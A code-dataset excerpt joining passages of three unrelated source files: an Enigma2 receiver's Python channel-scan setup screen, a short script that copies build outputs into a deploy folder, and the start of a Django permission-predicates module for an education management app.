(eDVBFrontendParametersSatellite.Pilot_On, _("On")),
(eDVBFrontendParametersSatellite.Pilot_Unknown, _("Auto"))])
# cable
self.scan_cab.frequency = ConfigInteger(default = defaultCab["frequency"], limits = (50, 999))
self.scan_cab.inversion = ConfigSelection(default = defaultCab["inversion"], choices = [
(eDVBFrontendParametersCable.Inversion_Off, _("Off")),
(eDVBFrontendParametersCable.Inversion_On, _("On")),
(eDVBFrontendParametersCable.Inversion_Unknown, _("Auto"))])
self.scan_cab.modulation = ConfigSelection(default = defaultCab["modulation"], choices = [
(eDVBFrontendParametersCable.Modulation_QAM16, "16-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM32, "32-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM64, "64-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM128, "128-QAM"),
(eDVBFrontendParametersCable.Modulation_QAM256, "256-QAM")])
self.scan_cab.fec = ConfigSelection(default = defaultCab["fec"], choices = [
(eDVBFrontendParametersCable.FEC_Auto, _("Auto")),
(eDVBFrontendParametersCable.FEC_1_2, "1/2"),
(eDVBFrontendParametersCable.FEC_2_3, "2/3"),
(eDVBFrontendParametersCable.FEC_3_4, "3/4"),
(eDVBFrontendParametersCable.FEC_5_6, "5/6"),
(eDVBFrontendParametersCable.FEC_7_8, "7/8"),
(eDVBFrontendParametersCable.FEC_8_9, "8/9"),
(eDVBFrontendParametersCable.FEC_3_5, "3/5"),
(eDVBFrontendParametersCable.FEC_4_5, "4/5"),
(eDVBFrontendParametersCable.FEC_9_10, "9/10"),
(eDVBFrontendParametersCable.FEC_None, _("None"))])
self.scan_cab.symbolrate = ConfigInteger(default = defaultCab["symbolrate"], limits = (1, 99999))
self.scan_cab.system = ConfigSelection(default = defaultCab["system"], choices = [
(eDVBFrontendParametersCable.System_DVB_C_ANNEX_A, _("DVB-C")),
(eDVBFrontendParametersCable.System_DVB_C_ANNEX_C, _("DVB-C ANNEX C"))])
# terrestial
self.scan_ter.frequency = ConfigInteger(default = defaultTer["frequency"], limits = (50000, 999000))
self.scan_ter.channel = ConfigInteger(default = 21, limits = (1, 99))
self.scan_ter.inversion = ConfigSelection(default = defaultTer["inversion"], choices = [
(eDVBFrontendParametersTerrestrial.Inversion_Off, _("Off")),
(eDVBFrontendParametersTerrestrial.Inversion_On, _("On")),
(eDVBFrontendParametersTerrestrial.Inversion_Unknown, _("Auto"))])
# WORKAROUND: we can't use BW-auto
self.scan_ter.bandwidth = ConfigSelection(default = defaultTer["bandwidth"], choices = [
(1712000, "1.712MHz"),
(5000000, "5MHz"),
(6000000, "6MHz"),
(7000000, "7MHz"),
(8000000, "8MHz"),
(10000000, "10MHz")
])
#, (eDVBFrontendParametersTerrestrial.Bandwidth_Auto, _("Auto"))))
self.scan_ter.fechigh = ConfigSelection(default = defaultTer["fechigh"], choices = [
(eDVBFrontendParametersTerrestrial.FEC_1_2, "1/2"),
(eDVBFrontendParametersTerrestrial.FEC_2_3, "2/3"),
(eDVBFrontendParametersTerrestrial.FEC_3_4, "3/4"),
(eDVBFrontendParametersTerrestrial.FEC_5_6, "5/6"),
(eDVBFrontendParametersTerrestrial.FEC_6_7, "6/7"),
(eDVBFrontendParametersTerrestrial.FEC_7_8, "7/8"),
(eDVBFrontendParametersTerrestrial.FEC_8_9, "8/9"),
(eDVBFrontendParametersTerrestrial.FEC_Auto, _("Auto"))])
self.scan_ter.feclow = ConfigSelection(default = defaultTer["feclow"], choices = [
(eDVBFrontendParametersTerrestrial.FEC_1_2, "1/2"),
(eDVBFrontendParametersTerrestrial.FEC_2_3, "2/3"),
(eDVBFrontendParametersTerrestrial.FEC_3_4, "3/4"),
(eDVBFrontendParametersTerrestrial.FEC_5_6, "5/6"),
(eDVBFrontendParametersTerrestrial.FEC_6_7, "6/7"),
(eDVBFrontendParametersTerrestrial.FEC_7_8, "7/8"),
(eDVBFrontendParametersTerrestrial.FEC_8_9, "8/9"),
(eDVBFrontendParametersTerrestrial.FEC_Auto, _("Auto"))])
self.scan_ter.modulation = ConfigSelection(default = defaultTer["modulation"], choices = [
(eDVBFrontendParametersTerrestrial.Modulation_QPSK, "QPSK"),
(eDVBFrontendParametersTerrestrial.Modulation_QAM16, "QAM16"),
(eDVBFrontendParametersTerrestrial.Modulation_QAM64, "QAM64"),
(eDVBFrontendParametersTerrestrial.Modulation_QAM256, "QAM256"),
(eDVBFrontendParametersTerrestrial.Modulation_Auto, _("Auto"))])
self.scan_ter.transmission = ConfigSelection(default = defaultTer["transmission_mode"], choices = [
(eDVBFrontendParametersTerrestrial.TransmissionMode_1k, "1K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_2k, "2K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_4k, "4K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_8k, "8K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_16k, "16K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_32k, "32K"),
(eDVBFrontendParametersTerrestrial.TransmissionMode_Auto, _("Auto"))])
self.scan_ter.guard = ConfigSelection(default = defaultTer["guard_interval"], choices = [
(eDVBFrontendParametersTerrestrial.GuardInterval_1_32, "1/32"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_16, "1/16"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_8, "1/8"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_4, "1/4"),
(eDVBFrontendParametersTerrestrial.GuardInterval_1_128, "1/128"),
(eDVBFrontendParametersTerrestrial.GuardInterval_19_128, "19/128"),
(eDVBFrontendParametersTerrestrial.GuardInterval_19_256, "19/256"),
(eDVBFrontendParametersTerrestrial.GuardInterval_Auto, _("Auto"))])
self.scan_ter.hierarchy = ConfigSelection(default = defaultTer["hierarchy"], choices = [
(eDVBFrontendParametersTerrestrial.Hierarchy_None, _("None")),
(eDVBFrontendParametersTerrestrial.Hierarchy_1, "1"),
(eDVBFrontendParametersTerrestrial.Hierarchy_2, "2"),
(eDVBFrontendParametersTerrestrial.Hierarchy_4, "4"),
(eDVBFrontendParametersTerrestrial.Hierarchy_Auto, _("Auto"))])
self.scan_ter.system = ConfigSelection(default = defaultTer["system"], choices = [
(eDVBFrontendParametersTerrestrial.System_DVB_T, _("DVB-T")),
(eDVBFrontendParametersTerrestrial.System_DVB_T2, _("DVB-T2"))])
self.scan_ter.plp_id = ConfigInteger(default = defaultTer["plp_id"], limits = (0, 255))
self.scan_scansat = {}
for sat in nimmanager.satList:
#print sat[1]
self.scan_scansat[sat[0]] = ConfigYesNo(default = False)
self.scan_satselection = []
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-S"):
self.scan_satselection.append(getConfigSatlist(defaultSat["orbpos"], self.satList[slot.slot]))
else:
self.scan_satselection.append(None)
self.terrestrial_nims_regions = []
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-T"):
self.terrestrial_nims_regions.append(self.getTerrestrialRegionsList(slot.slot))
else:
self.terrestrial_nims_regions.append(None)
if frontendData is not None and ttype == "DVB-S" and self.predefinedTranspondersList(defaultSat["orbpos"]) is not None:
defaultSatSearchType = "predefined_transponder"
else:
defaultSatSearchType = "single_transponder"
if frontendData is not None and ttype == "DVB-T" and self.predefinedTerrTranspondersList() is not None:
defaultTerrSearchType = "predefined_transponder"
else:
defaultTerrSearchType = "single_transponder"
if frontendData is not None and ttype == "DVB-C" and self.predefinedCabTranspondersList() is not None:
defaultCabSearchType = "predefined_transponder"
else:
defaultCabSearchType = "single_transponder"
self.scan_type = ConfigSelection(default = defaultSatSearchType, choices = [("single_transponder", _("User defined transponder")), ("predefined_transponder", _("Predefined transponder")), ("single_satellite", _("Single satellite")), ("multisat", _("Multisat")), ("multisat_yes", _("Multisat all select"))])
self.scan_typecable = ConfigSelection(default = defaultCabSearchType, choices = [("single_transponder", _("User defined transponder")), ("predefined_transponder", _("Predefined transponder")), ("complete", _("Complete"))])
self.last_scan_typecable = "single_transponder"
self.cable_toggle = {"single_transponder":"complete", "complete":"single_transponder"}
self.scan_typeterrestrial = ConfigSelection(default = defaultTerrSearchType, choices = [("single_transponder", _("User defined transponder")), ("predefined_transponder", _("Predefined transponder")), ("complete", _("Complete"))])
self.scan_input_as = ConfigSelection(default = "channel", choices = [("frequency", _("Frequency")), ("channel", _("Channel"))])
self.scan_clearallservices = ConfigSelection(default = "no", choices = [("no", _("no")), ("yes", _("yes")), ("yes_hold_feeds", _("yes (keep feeds)"))])
self.scan_onlyfree = ConfigYesNo(default = False)
self.scan_networkScan = ConfigYesNo(default = False)
return True
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.newConfig()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.newConfig()
def handleKeyFileCallback(self, answer):
ConfigListScreen.handleKeyFileCallback(self, answer)
self.newConfig()
def updateStatus(self):
print "updatestatus"
def addSatTransponder(self, tlist, frequency, symbol_rate, polarisation, fec, inversion, orbital_position, system, modulation, rolloff, pilot):
print "Add Sat: frequ: " + str(frequency) + " symbol: " + str(symbol_rate) + " pol: " + str(polarisation) + " fec: " + str(fec) + " inversion: " + str(inversion) + " modulation: " + str(modulation) + " system: " + str(system) + " rolloff" + str(rolloff) + " pilot" + str(pilot)
print "orbpos: " + str(orbital_position)
parm = eDVBFrontendParametersSatellite()
parm.modulation = modulation
parm.system = system
parm.frequency = frequency * 1000
parm.symbol_rate = symbol_rate * 1000
parm.polarisation = polarisation
parm.fec = fec
parm.inversion = inversion
parm.orbital_position = orbital_position
parm.rolloff = rolloff
parm.pilot = pilot
tlist.append(parm)
def addCabTransponder(self, tlist, frequency, symbol_rate, modulation, fec, inversion):
print "Add Cab: frequ: " + str(frequency) + " symbol: " + str(symbol_rate) + " pol: " + str(modulation) + " fec: " + str(fec) + " inversion: " + str(inversion)
parm = eDVBFrontendParametersCable()
parm.frequency = frequency
parm.symbol_rate = symbol_rate
parm.modulation = modulation
parm.fec_inner = fec
parm.inversion = inversion
tlist.append(parm)
def addTerTransponder(self, tlist, *args, **kwargs):
tlist.append(buildTerTransponder(*args, **kwargs))
def keyGo(self):
infoBarInstance = InfoBar.instance
if infoBarInstance:
infoBarInstance.checkTimeshiftRunning(self.keyGoCheckTimeshiftCallback)
else:
self.keyGoCheckTimeshiftCallback(True)
def keyGoCheckTimeshiftCallback(self, answer):
START_SCAN = 0
SEARCH_CABLE_TRANSPONDERS = 1
SEARCH_TERRESTRIAL2_TRANSPONDERS = 2
if not answer or self.scan_nims.value == "":
return
tlist = []
flags = None
removeAll = True
action = START_SCAN
index_to_scan = int(self.scan_nims.value)
if self.scan_nims == [ ]:
self.session.open(MessageBox, _("No tuner is enabled!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
return
nim = nimmanager.nim_slots[index_to_scan]
print "nim", nim.slot
if nim.isCompatible("DVB-S"):
print "is compatible with DVB-S"
if self.scan_type.value == "single_transponder":
# these lists are generated for each tuner, so this has work.
assert len(self.satList) > index_to_scan
assert len(self.scan_satselection) > index_to_scan
nimsats = self.satList[index_to_scan]
selsatidx = self.scan_satselection[index_to_scan].index
# however, the satList itself could be empty. in that case, "index" is 0 (for "None").
if len(nimsats):
orbpos = nimsats[selsatidx][0]
if self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S:
fec = self.scan_sat.fec.value
else:
fec = self.scan_sat.fec_s2.value
print "add sat transponder"
self.addSatTransponder(tlist, self.scan_sat.frequency.value,
self.scan_sat.symbolrate.value,
self.scan_sat.polarization.value,
fec,
self.scan_sat.inversion.value,
orbpos,
self.scan_sat.system.value,
self.scan_sat.modulation.value,
self.scan_sat.rolloff.value,
self.scan_sat.pilot.value)
removeAll = False
elif self.scan_type.value == "predefined_transponder":
nimsats = self.satList[index_to_scan]
selsatidx = self.scan_satselection[index_to_scan].index
if len(nimsats):
orbpos = nimsats[selsatidx][0]
tps = nimmanager.getTransponders(orbpos)
if len(tps) and len(tps) > self.preDefTransponders.index:
tp = tps[self.preDefTransponders.index]
self.addSatTransponder(tlist, tp[1] / 1000, tp[2] / 1000, tp[3], tp[4], tp[7], orbpos, tp[5], tp[6], tp[8], tp[9])
removeAll = False
elif self.scan_type.value == "single_satellite":
sat = self.satList[index_to_scan][self.scan_satselection[index_to_scan].index]
getInitialTransponderList(tlist, sat[0])
elif "multisat" in self.scan_type.value:
SatList = nimmanager.getSatListForNim(index_to_scan)
for x in self.multiscanlist:
if x[1].value:
print " " + str(x[0])
getInitialTransponderList(tlist, x[0])
elif nim.isCompatible("DVB-C"):
if self.scan_typecable.value == "single_transponder":
self.addCabTransponder(tlist, self.scan_cab.frequency.value*1000,
self.scan_cab.symbolrate.value*1000,
self.scan_cab.modulation.value,
self.scan_cab.fec.value,
self.scan_cab.inversion.value)
removeAll = False
elif self.scan_typecable.value == "predefined_transponder":
tps = nimmanager.getTranspondersCable(index_to_scan)
if len(tps) and len(tps) > self.CableTransponders.index :
tp = tps[self.CableTransponders.index]
# 0 transponder type, 1 freq, 2 sym, 3 mod, 4 fec, 5 inv, 6 sys
self.addCabTransponder(tlist, tp[1], tp[2], tp[3], tp[4], tp[5])
removeAll = False
elif self.scan_typecable.value == "complete":
if config.Nims[index_to_scan].cable.scan_type.value == "provider":
getInitialCableTransponderList(tlist, index_to_scan)
else:
action = SEARCH_CABLE_TRANSPONDERS
elif nim.isCompatible("DVB-T"):
if self.scan_typeterrestrial.value == "single_transponder":
if self.scan_input_as.value == "channel":
frequency = channelnumbers.channel2frequency(self.scan_ter.channel.value, self.ter_tnumber)
else:
frequency = self.scan_ter.frequency.value * 1000
self.addTerTransponder(tlist,
frequency,
inversion = self.scan_ter.inversion.value,
bandwidth = self.scan_ter.bandwidth.value,
fechigh = self.scan_ter.fechigh.value,
feclow = self.scan_ter.feclow.value,
modulation = self.scan_ter.modulation.value,
transmission = self.scan_ter.transmission.value,
guard = self.scan_ter.guard.value,
hierarchy = self.scan_ter.hierarchy.value,
system = self.scan_ter.system.value,
plpid = self.scan_ter.plp_id.value)
removeAll = False
elif self.scan_typeterrestrial.value == "predefined_transponder":
if self.TerrestrialTransponders is not None:
region = self.terrestrial_nims_regions[index_to_scan].value
tps = nimmanager.getTranspondersTerrestrial(region)
if len(tps) and len(tps) > self.TerrestrialTransponders.index :
tp = tps[self.TerrestrialTransponders.index]
tlist.append(buildTerTransponder(tp[1], tp[9], tp[2], tp[4], tp[5], tp[3], tp[7], tp[6], tp[8], tp[10], tp[11]))
removeAll = False
elif self.scan_typeterrestrial.value == "complete":
skip_t2 = False
if getMachineBrand() in ('Vu+'):
skip_t2 = True
if nim.isCompatible("DVB-T2"):
scan_util = len(self.terrestrialTransponderGetCmd(nim.slot)) and True or False
if scan_util:
action = SEARCH_TERRESTRIAL2_TRANSPONDERS
else:
skip_t2 = False
getInitialTerrestrialTransponderList(tlist, self.TerrestrialRegion.value, skip_t2)
flags = self.scan_networkScan.value and eComponentScan.scanNetworkSearch or 0
tmp = self.scan_clearallservices.value
if tmp == "yes":
flags |= eComponentScan.scanRemoveServices
elif tmp == "yes_hold_feeds":
flags |= eComponentScan.scanRemoveServices
flags |= eComponentScan.scanDontRemoveFeeds
if tmp != "no" and not removeAll:
flags |= eComponentScan.scanDontRemoveUnscanned
if self.scan_onlyfree.value:
flags |= eComponentScan.scanOnlyFree
for x in self["config"].list:
x[1].save()
if action == START_SCAN:
self.startScan(tlist, flags, index_to_scan, self.networkid)
elif action == SEARCH_CABLE_TRANSPONDERS:
self.flags = flags
self.feid = index_to_scan
self.tlist = []
self.startCableTransponderSearch(self.feid)
elif action == SEARCH_TERRESTRIAL2_TRANSPONDERS:
self.flags = flags
self.feid = index_to_scan
self.tlist = tlist
self.startTerrestrialTransponderSearch(self.feid, nimmanager.getTerrestrialDescription(self.feid))
def setCableTransponderSearchResult(self, tlist):
self.tlist = tlist
def cableTransponderSearchFinished(self):
if self.tlist is None:
self.tlist = []
else:
self.startScan(self.tlist, self.flags, self.feid)
def setTerrestrialTransponderSearchResult(self, tlist):
if tlist is not None:
self.tlist.extend(tlist)
def terrestrialTransponderSearchFinished(self):
if self.tlist is None:
self.tlist = []
else:
self.startScan(self.tlist, self.flags, self.feid)
def predefinedTranspondersList(self, orbpos):
default = None
if orbpos is not None:
list = []
if self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S2:
fec = self.scan_sat.fec_s2.value
else:
fec = self.scan_sat.fec.value
compare = [0, self.scan_sat.frequency.value*1000, self.scan_sat.symbolrate.value*1000, self.scan_sat.polarization.value, fec]
i = 0
tps = nimmanager.getTransponders(orbpos)
for tp in tps:
if tp[0] == 0:
if default is None and self.compareTransponders(tp, compare):
default = str(i)
list.append((str(i), self.humanReadableTransponder(tp)))
i += 1
self.preDefTransponders = ConfigSelection(choices = list, default = default)
return default
def humanReadableTransponder(self, tp):
if tp[3] in range (4) and tp[4] in range (11):
pol_list = ['H','V','L','R']
fec_list = ['Auto','1/2','2/3','3/4','5/6','7/8','8/9','3/5','4/5','9/10','None']
return str(tp[1] / 1000) + " " + pol_list[tp[3]] + " " + str(tp[2] / 1000) + " " + fec_list[tp[4]]
return _("Invalid transponder data")
def compareTransponders(self, tp, compare):
frequencyTolerance = 2000 #2 MHz
symbolRateTolerance = 10
return abs(tp[1] - compare[1]) <= frequencyTolerance and abs(tp[2] - compare[2]) <= symbolRateTolerance and tp[3] == compare[3] and (not tp[4] or tp[4] == compare[4])
def predefinedTerrTranspondersList(self):
default = None
list = []
compare = [2, self.scan_ter.frequency.value*1000]
i = 0
index_to_scan = int(self.scan_nims.value)
channels = channelnumbers.supportedChannels(index_to_scan)
region = self.terrestrial_nims_regions[index_to_scan].value
tps = nimmanager.getTranspondersTerrestrial(region)
for tp in tps:
if tp[0] == 2: #TERRESTRIAL
channel = ''
if channels:
channel = _(' (Channel %s)') % (channelnumbers.getChannelNumber(tp[1], index_to_scan))
if default is None and self.compareTerrTransponders(tp, compare):
default = str(i)
list.append((str(i), '%s MHz %s' % (str(tp[1] / 1000000), channel)))
i += 1
print "channel", channel
self.TerrestrialTransponders = ConfigSelection(choices = list, default = default)
return default
def compareTerrTransponders(self, tp, compare):
frequencyTolerance = 1000000 #1 MHz
return abs(tp[1] - compare[1]) <= frequencyTolerance
def getTerrestrialRegionsList(self, index_to_scan = None):
default = None
list = []
if index_to_scan is None:
index_to_scan = int(self.scan_nims.value)
defaultRegionForNIM = nimmanager.getTerrestrialDescription(index_to_scan)
for r in nimmanager.terrestrialsList:
if default is None and r[0] == defaultRegionForNIM:
default = r[0]
list.append((r[0], r[0][:46]))
return ConfigSelection(choices = list, default = default)
def predefinedCabTranspondersList(self):
default = None
list = []
# 0 transponder type, 1 freq, 2 sym, 3 mod, 4 fec, 5 inv, 6 sys
compare = [1, self.scan_cab.frequency.value*1000, self.scan_cab.symbolrate.value*1000, self.scan_cab.modulation.value, self.scan_cab.fec.value, self.scan_cab.inversion.value, self.scan_cab.system.value]
i = 0
index_to_scan = int(self.scan_nims.value)
tps = nimmanager.getTranspondersCable(index_to_scan)
for tp in tps:
if tp[0] == 1: #CABLE
if default is None and self.compareCabTransponders(tp, compare):
default = str(i)
list.append((str(i), self.humanReadableCabTransponder(tp)))
i += 1
self.CableTransponders = ConfigSelection(choices = list, default = default)
return default
def humanReadableCabTransponder(self, tp):
if tp[3] in range (7) and (tp[4] in range (10) or tp[4] == 15):
mod_list = ['Auto', '16-QAM','32-QAM','64-QAM','128-QAM', '256-QAM', 'Auto']
fec_list = {0:"Auto", 1:'1/2', 2:'2/3', 3:'3/4', 4:'5/6', 5:'7/8', 6:'8/9', 7:'3/5', 8:'4/5', 9:'9/10', 15:'None'}
print str(tp[1]/1000) + " MHz " + fec_list[tp[4]] + " " + str(tp[2]/1000) + " " + mod_list[tp[3]]
return str(tp[1]/1000) + " MHz " + fec_list[tp[4]] + " " + str(tp[2]/1000) + " " + mod_list[tp[3]]
return _("Invalid transponder data")
def compareCabTransponders(self, tp, compare):
frequencyTolerance = 1000000 #1 MHz
symbolRateTolerance = 10
return abs(tp[1] - compare[1]) <= frequencyTolerance and abs(tp[2] - compare[2]) <= symbolRateTolerance and tp[3] == compare[3] and (not tp[4] or tp[4] == compare[4])
def startScan(self, tlist, flags, feid, networkid = 0):
if len(tlist):
# flags |= eComponentScan.scanSearchBAT
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, ServiceScan, [{"transponders": tlist, "feid": feid, "flags": flags, "networkid": networkid}])
else:
self.session.openWithCallback(self.startScanCallback, ServiceScan, [{"transponders": tlist, "feid": feid, "flags": flags, "networkid": networkid}])
else:
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
else:
self.session.open(MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
def startScanCallback(self, answer=True):
if answer:
self.doCloseRecursive()
def keyCancel(self):
self.session.nav.playService(self.session.postScanService)
for x in self["config"].list:
x[1].cancel()
self.close()
def doCloseRecursive(self):
self.session.nav.playService(self.session.postScanService)
self.closeRecursive()
class ScanSimple(ConfigListScreen, Screen, CableTransponderSearchSupport, TerrestrialTransponderSearchSupport):
def getNetworksForNim(self, nim):
if nim.isCompatible("DVB-S"):
networks = nimmanager.getSatListForNim(nim.slot)
elif nim.isCompatible("DVB-T"):
networks = nimmanager.getTerrestrialDescription(nim.slot)
elif not nim.empty:
networks = [ nim.type ]
else:
# empty tuners provide no networks.
networks = [ ]
return networks
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Automatic Scan"))
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Scan"))
self["actions"] = ActionMap(["SetupActions", "MenuActions", "ColorActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.keyCancel,
"menu": self.doCloseRecursive,
"red": self.keyCancel,
"green": self.keyGo,
}, -2)
self.session.postScanService = session.nav.getCurrentlyPlayingServiceOrGroup()
self.list = []
tlist = []
known_networks = [ ]
nims_to_scan = [ ]
self.finished_cb = None
for nim in nimmanager.nim_slots:
# collect networks provided by this tuner
need_scan = False
networks = self.getNetworksForNim(nim)
print "nim %d provides" % nim.slot, networks
print "known:", known_networks
# we only need to scan on the first tuner which provides a network.
# this gives the first tuner for each network priority for scanning.
for x in networks:
if x not in known_networks:
need_scan = True
print x, "not in ", known_networks
known_networks.append(x)
# don't offer to scan nims if nothing is connected
if not nimmanager.somethingConnected(nim.slot):
need_scan = False
if need_scan:
nims_to_scan.append(nim)
# we save the config elements to use them on keyGo
self.nim_enable = [ ]
if len(nims_to_scan):
self.scan_networkScan = ConfigYesNo(default = True)
self.scan_clearallservices = ConfigSelection(default = "yes", choices = [("no", _("no")), ("yes", _("yes")), ("yes_hold_feeds", _("yes (keep feeds)"))])
self.list.append(getConfigListEntry(_("Network scan"), self.scan_networkScan))
self.list.append(getConfigListEntry(_("Clear before scan"), self.scan_clearallservices))
for nim in nims_to_scan:
nimconfig = ConfigYesNo(default = True)
nimconfig.nim_index = nim.slot
self.nim_enable.append(nimconfig)
self.list.append(getConfigListEntry(_("Scan ") + nim.slot_name + " (" + nim.friendly_type + ")", nimconfig))
ConfigListScreen.__init__(self, self.list)
self["header"] = Label(_("Automatic scan"))
self["footer"] = Label(_("Press OK to scan"))
def runAsync(self, finished_cb):
self.finished_cb = finished_cb
self.keyGo()
def keyGo(self):
InfoBarInstance = InfoBar.instance
if InfoBarInstance:
InfoBarInstance.checkTimeshiftRunning(self.keyGoCheckTimeshiftCallback)
else:
self.keyGoCheckTimeshiftCallback(True)
def keyGoCheckTimeshiftCallback(self, answer):
if answer:
self.scanList = []
self.known_networks = set()
self.nim_iter=0
self.buildTransponderList()
def buildTransponderList(self): # this method is called multiple times because of asynchronous stuff
APPEND_NOW = 0
SEARCH_CABLE_TRANSPONDERS = 1
SEARCH_TERRESTRIAL2_TRANSPONDERS = 2
action = APPEND_NOW
n = self.nim_iter < len(self.nim_enable) and self.nim_enable[self.nim_iter] or None
self.nim_iter += 1
if n:
if n.value: # check if nim is enabled
flags = 0
nim = nimmanager.nim_slots[n.nim_index]
networks = set(self.getNetworksForNim(nim))
networkid = 0
# don't scan anything twice
networks.discard(self.known_networks)
tlist = [ ]
if nim.isCompatible("DVB-S"):
# get initial transponders for each satellite to be scanned
for sat in networks:
getInitialTransponderList(tlist, sat[0])
elif nim.isCompatible("DVB-C"):
if config.Nims[nim.slot].cable.scan_type.value == "provider":
getInitialCableTransponderList(tlist, nim.slot)
else:
action = SEARCH_CABLE_TRANSPONDERS
networkid = config.Nims[nim.slot].cable.scan_networkid.value
elif nim.isCompatible("DVB-T"):
skip_t2 = False
if getMachineBrand() in ('Vu+'):
skip_t2 = True
if nim.isCompatible("DVB-T2"):
scan_util = len(self.terrestrialTransponderGetCmd(nim.slot)) and True or False
if scan_util:
action = SEARCH_TERRESTRIAL2_TRANSPONDERS
else:
skip_t2 = False
getInitialTerrestrialTransponderList(tlist, nimmanager.getTerrestrialDescription(nim.slot), skip_t2)
else:
assert False
flags = self.scan_networkScan.value and eComponentScan.scanNetworkSearch or 0
tmp = self.scan_clearallservices.value
if tmp == "yes":
flags |= eComponentScan.scanRemoveServices
elif tmp == "yes_hold_feeds":
flags |= eComponentScan.scanRemoveServices
flags |= eComponentScan.scanDontRemoveFeeds
if action == APPEND_NOW:
self.scanList.append({"transponders": tlist, "feid": nim.slot, "flags": flags})
elif action == SEARCH_CABLE_TRANSPONDERS:
self.flags = flags
self.feid = nim.slot
self.networkid = networkid
self.startCableTransponderSearch(nim.slot)
return
elif action == SEARCH_TERRESTRIAL2_TRANSPONDERS:
self.tlist = tlist
self.flags = flags
self.feid = nim.slot
self.startTerrestrialTransponderSearch(nim.slot, nimmanager.getTerrestrialDescription(nim.slot))
return
else:
assert False
self.buildTransponderList() # recursive call of this function !!!
return
# when we are here, then the recursion is finished and all enabled nims are checked
# so we now start the real transponder scan
self.startScan(self.scanList)
def startScan(self, scanList):
if len(scanList):
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, ServiceScan, scanList = scanList)
else:
self.session.open(ServiceScan, scanList = scanList)
else:
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
else:
self.session.open(MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
def setCableTransponderSearchResult(self, tlist):
if tlist is not None:
self.scanList.append({"transponders": tlist, "feid": self.feid, "flags": self.flags})
def cableTransponderSearchFinished(self):
self.buildTransponderList()
def setTerrestrialTransponderSearchResult(self, tlist):
if tlist is not None:
self.tlist.extend(tlist)
if self.tlist is not None:
self.scanList.append({"transponders": self.tlist, "feid": self.feid, "flags": self.flags})
def terrestrialTransponderSearchFinished(self):
self.buildTransponderList()
def keyCancel(self):
self.session.nav.playService(self.session.postScanService)
self.close()
def doCloseRecursive(self):
self.session.nav.playService(self.session.postScanService)
self.closeRecursive()
def Satexists(self, tlist, pos):
for x in tlist:
if x == pos:
return 1
return 0
|
OpenLD/enigma2-wetek
|
lib/python/Screens/ScanSetup.py
|
Python
|
gpl-2.0
| 68,521 | 0.030093 |
import os
import re
import shutil
destination = 'C:/Software/Pimix/'
apps = [
'fileutil',
'jobutil'
]
include_patterns = [
r'\.exe',
r'\.exe\.config',
r'\.dll',
r'\.pdb'
]
exclude_patterns = [
'FSharp',
'vshost'
]
os.makedirs(destination, exist_ok=True)
for app in apps:
for entry in os.scandir('src/{}/bin/Release/'.format(app)):
to_copy = False
for p in include_patterns:
if re.search(p, entry.path):
to_copy = True
break
if not to_copy:
continue
for p in exclude_patterns:
if re.search(p, entry.path):
to_copy = False
break
if to_copy:
shutil.copyfile(entry.path, '{}{}'.format(destination, entry.name))
|
Kimi-Arthur/Pimix
|
deploy.py
|
Python
|
mit
| 805 | 0 |
from typing import Union
from django.conf import settings
from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _, pgettext
from rules import predicate
from base.models.academic_year import current_academic_year
from base.models.education_group_year import EducationGroupYear
from base.models.enums.education_group_categories import Categories
from base.models.enums.education_group_types import TrainingType
from education_group.auth.scope import Scope
from education_group.calendar.education_group_extended_daily_management import \
EducationGroupExtendedDailyManagementCalendar
from education_group.calendar.education_group_limited_daily_management import \
EducationGroupLimitedDailyManagementCalendar
from education_group.calendar.education_group_preparation_calendar import EducationGroupPreparationCalendar
from education_group.models.group_year import GroupYear
from osis_common.ddd import interface
from osis_role.cache import predicate_cache
from osis_role.errors import predicate_failed_msg, set_permission_error, get_permission_error
from program_management.ddd.domain import exception
from program_management.models.element import Element
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_training_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_mini_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_minitraining_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_trainings_removable(self, user, training_root):
training_roots = training_root.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, training_roots, 'base.delete_training')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
